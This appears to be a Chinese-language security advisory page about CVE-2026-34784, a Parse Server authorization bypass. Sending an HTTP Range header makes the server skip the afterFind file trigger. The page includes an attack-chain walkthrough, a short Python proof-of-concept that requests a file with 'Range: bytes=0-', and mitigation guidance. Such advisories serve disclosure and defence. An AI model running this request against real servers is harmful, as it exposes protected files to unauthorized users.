IPBUF安全漏洞报告
English
CVE-2026-34784 CVSS 7.5 高危

CVE-2026-34784 Parse Server 权限绕过漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34784
漏洞类型
权限绕过
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Parse Server

相关标签

权限绕过Parse ServerCVE-2026-34784HTTP Range RequestAccess Control

漏洞概述

Parse Server 在特定版本前存在安全漏洞,攻击者通过发送 HTTP Range 请求下载文件时,可以绕过 afterFind(Parse.File) 触发器及其验证器。这导致未经授权的用户能够访问本应受保护的文件资源,绕过了开发者定义的授权逻辑或内置验证器,造成敏感数据泄露风险。

技术细节

该漏洞发生在 Parse Server 处理文件下载请求的过程中。当存储适配器支持流式传输(例如默认的 GridFS 适配器)时,如果客户端发送的 HTTP GET 请求中包含 Range 头,服务器会直接处理文件流而跳过 `afterFind(Parse.File)` 触发器的执行。由于该触发器通常用于执行权限检查(如验证用户身份、访问令牌或 requireUser 验证器),其被绕过意味着攻击者可以在无需认证或权限的情况下下载敏感文件。利用方式非常简单,仅需在请求中添加 'Range: bytes=0-' 字段即可触发漏洞路径。

攻击链分析

STEP 1
1. 侦察
攻击者识别出目标使用的是存在漏洞的 Parse Server 版本,并定位到受保护的文件下载链接。
STEP 2
2. 构造恶意请求
攻击者向目标文件 URL 发送 HTTP GET 请求,并在请求头中特意添加 'Range: bytes=0-' 字段。
STEP 3
3. 绕过安全检查
服务器处理 Range 请求时,直接通过流式传输返回文件内容,错误地跳过了 afterFind 触发器及相关的权限验证逻辑。
STEP 4
4. 数据泄露
攻击者成功接收到服务器返回的 206 Partial Content 响应,下载了本应受保护的敏感文件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of a file hosted on Parse Server target_url = "http://vulnerable-server.com/parse/files/ApplicationId/sensitive_file.zip" # The vulnerability is triggered by sending a Range header headers = { "Range": "bytes=0-", # Requests the first byte onwards "User-Agent": "PoC-Client/1.0" } try: response = requests.get(target_url, headers=headers) # Check if the server responded with Partial Content (206) # indicating the file was served despite potential access controls if response.status_code == 206: print("[+] Vulnerability Exploited Successfully!") print(f"[+] Received {len(response.content)} bytes of data.") elif response.status_code == 200: print("[!] File downloaded (200 OK), check if authorization was bypassed.") elif response.status_code == 401 or response.status_code == 403: print("[-] Access Denied. Target might be patched or not vulnerable.") else: print(f"[?] Unexpected status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

Parse Server < 8.6.71
Parse Server < 9.7.1-alpha.1

防御指南

临时缓解措施
如果无法立即升级版本,建议在反向代理(如 Nginx)或 Web 应用防火墙(WAF)层面,针对 Parse Server 的文件下载路径实施严格的访问控制策略,或者暂时拦截包含 Range 请求头的 HTTP 请求,以强制触发应用层的权限校验。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表